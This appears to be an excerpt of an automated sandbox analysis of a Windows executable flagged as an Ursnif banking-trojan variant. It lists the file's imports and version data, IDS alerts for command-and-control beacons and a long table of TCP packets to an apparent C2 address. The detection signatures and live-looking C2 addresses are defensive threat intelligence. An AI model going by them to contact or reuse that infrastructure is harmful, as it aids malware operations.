RT_DIALOG | 0x6bab8 | 0xa0 | data | English | United States |
RT_DIALOG | 0x6bb58 | 0xee | data | English | United States |
RT_GROUP_ICON | 0x6bc48 | 0x4c | data | English | United States |
RT_VERSION | 0x6bc98 | 0x290 | MS Windows COFF PA-RISC object file | English | United States |
DLL | Import |
---|---|
KERNEL32.dll | EraseTape, GetDiskFreeSpaceExA, lstrlenA, LocalHandle, GetModuleFileNameA, GetBinaryTypeA, GetThreadLocale, GetFileTime, GlobalFlags, GetStringTypeA, EnumResourceTypesA, GetConsoleCP, GetCommTimeouts, WriteProcessMemory, GlobalMemoryStatus, DebugBreak |
OLEAUT32.dll | GetRecordInfoFromTypeInfo, LoadTypeLibEx |
USER32.dll | DefMDIChildProcW, GetMenuItemRect, MessageBoxIndirectW, DeleteMenu, GetClassNameA, GetMessagePos, GetUpdateRgn, GetClientRect, GetScrollBarInfo |
GDI32.dll | ExtSelectClipRgn, GetBkColor, GetCharWidthFloatA, GetTextMetricsW, GdiComment |
ADVAPI32.dll | EnumServicesStatusExW, InitiateSystemShutdownExW, RegGetValueA |
msvcrt.dll | strcoll, fgetwc, srand |
Description | Data |
---|---|
LegalCopyright | A Company. All rights reserved. |
InternalName | |
FileVersion | 1.0.0.0 |
CompanyName | A Company |
ProductName | |
ProductVersion | 1.0.0.0 |
FileDescription | |
OriginalFilename | myfile.exe |
Translation | 0x0409 0x04b0 |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
05/04/22-16:20:11.489303 05/04/22-16:20:11.489303 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
05/04/22-16:20:12.290322 05/04/22-16:20:12.290322 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
05/04/22-16:19:50.763686 05/04/22-16:19:50.763686 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49768 | 80 | 192.168.2.7 | 13.107.42.16 |
05/04/22-16:20:10.851257 05/04/22-16:20:10.851257 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 4, 2022 16:20:10.831989050 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:10.849381924 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:10.849616051 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:10.851257086 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:10.868570089 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.145236969 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.145265102 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.145277023 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.145503998 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.145530939 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.145554066 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.145603895 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.145647049 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.145721912 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.145740032 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.145751953 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.145768881 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.145777941 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.145818949 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.146009922 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.146078110 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.146162033 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.146198988 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.146212101 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.146259069 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.146267891 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.146796942 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.146871090 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.162543058 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.162590981 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.162615061 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.162641048 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.162667036 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.162686110 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.162709951 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.162734985 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.162755013 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.162780046 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.162807941 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.162827969 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.162870884 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.162911892 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.162919044 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.162923098 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.162950993 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.162981033 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163001060 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163029909 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163058043 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163079023 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163104057 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.163110018 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.163186073 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163213015 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163232088 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163259983 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163263083 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.163285971 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.163289070 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163290024 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.163307905 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163332939 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163351059 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.163357019 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.163362026 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163381100 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163414001 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.163419962 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.163858891 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163887978 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163908005 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163932085 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.164009094 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.180193901 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.180265903 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.180305004 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.180351973 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.180401087 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.180437088 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.180532932 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.180577040 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.180587053 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.180684090 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.180911064 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.181236029 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.181291103 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.181341887 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.181391954 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.181397915 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.181406975 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.181442022 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.181493998 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.181549072 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.183239937 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.183288097 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.183320045 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.183362961 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.183387041 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.183635950 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.183685064 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.183727980 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.183743954 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.183760881 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.183789015 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.183790922 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.183831930 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.183871984 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.183979034 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184036016 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184040070 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.184076071 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184206009 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184222937 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.184272051 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184315920 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184336901 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.184350967 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.184386015 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184422970 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184426069 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.184439898 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.184515953 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184570074 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.184607029 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184645891 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184686899 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184726954 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184768915 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184777975 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.184797049 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.184806108 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.184829950 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.184832096 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184873104 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184914112 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184953928 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184977055 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.184993029 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.184994936 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185003042 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.185053110 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185096025 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185117960 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.185153961 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.185157061 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185197115 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185214043 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.185256958 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185297966 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185337067 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.185349941 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185352087 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.185409069 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185420036 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.185450077 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185466051 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.185508013 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185553074 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185574055 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.185594082 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185641050 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185684919 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185695887 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.185714960 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.185724974 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185734987 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.197885036 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.197941065 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.197973967 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198015928 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198055029 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198064089 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198086023 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198088884 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198096037 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198101997 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198136091 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198163033 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198184967 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198189974 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198436022 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198481083 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198535919 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198538065 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198576927 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198580980 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198597908 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198658943 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198699951 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198708057 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198717117 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198756933 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198815107 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198863983 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198875904 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198883057 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198904991 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198942900 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198951006 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198955059 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198971033 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.199023008 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.199620962 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.199667931 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.199696064 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.199734926 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.199754953 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.200613976 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.200706005 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.200721979 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.200764894 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.200817108 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.200819016 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.200822115 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.200879097 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.200917959 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.200932026 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.200936079 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.201226950 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.201296091 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.201297998 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.201355934 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.201400042 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.201404095 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.201411963 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.201466084 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.201498032 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.201523066 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.201528072 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.202259064 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.202316046 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.202337027 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.202347994 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.202385902 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.203457117 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.203504086 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.203526020 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.203548908 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.203563929 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.203603029 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.203609943 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.203668118 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.203710079 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.203716040 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.203725100 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.203782082 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.203820944 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.203825951 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.203840971 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.203880072 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.203915119 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.203938961 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.203994989 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.204039097 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.204055071 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.204062939 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.204092979 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.204114914 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.204133987 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.204174042 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.204181910 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.204185963 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.204214096 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
